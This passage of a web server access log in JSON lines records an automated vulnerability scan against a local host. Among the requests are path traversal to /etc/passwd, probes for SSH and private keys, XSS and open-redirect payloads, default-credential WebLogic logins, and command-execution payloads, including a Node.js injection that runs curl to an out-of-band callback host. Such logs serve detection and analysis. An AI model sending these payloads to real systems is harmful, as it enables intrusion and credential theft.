Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hmc/hybris HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"j_username=weblogic&j_password=Oracle@123&j_character_encoding=UTF-8","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%0a%0dexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.ssh/id_dsa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/ci-daily.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/heapdump HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfcache.map HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hub/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?event1=&event2=&event3=download&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /BitKeeper/etc/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/airflow/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/insert-php/readme.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"notdelay=true&command=cat /etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cli.php?a=shell HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hybris/hmc/hybris HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"j_username=weblogic&j_password=weblogic123&j_character_encoding=UTF-8","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%09/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/ci-issues.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /account HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /magmi/web/js/magmi_utils.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/rk.php?id=28&site_id=s2&event1=banner&event2=click&event3=3+%2F+%5B28%5D+%5BBANNER_AREA_FOOTER2%5D+%D0%9F%D0%BE%D1%81%D0%B5%D1%82%D0%B8%D1%82%D0%B5+%D0%B2%D0%B2%D0%BE%D0%B4%D0%BD%D1%83%D1%8E+%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D1%83%D1%8E+%D0%BB%D0%B5%D0%BA%D1%86%D0%B8%D1%8E+APTOS&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"document=this.constructor.constructor(\x22return process\x22)().mainModule.require(\x22child_process\x22).execSync(\x22curl http://ca28bc0smpvbbtig07h0jwi69h8khapq7.oast.pro\x22)","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /checkValid HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php/passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/affwp-debug.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss%27%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tips/tipsLogin.action HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"j_username=admin&j_password=12345678&j_character_encoding=UTF-8","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%2f%2f.example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.pem HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/smoosh-status.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ovirt-engine/userportal/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /resin-doc/viewfile/?file=index.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /checker/login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/rk.php?id=84&site_id=n1&event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"user=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /includes/mysql2i/mysql2i.func.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mobile.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cobbler_web HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"j_username=admin&j_password=security&j_character_encoding=UTF-8","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%3F.example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVersion HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/jwt/private.pem HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/snyk.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ovirt-engine/webadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sap/bc/ui5_ui5/ui2/ushell/shells/abap/FioriLaunchpad.html?saml2=disabled HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /readme.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"bsh.script=exec(\x22cat+/etc/passwd\x22);&bsh.servlet.output=raw","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /bsh.servlet.BshServlet HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.037","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) 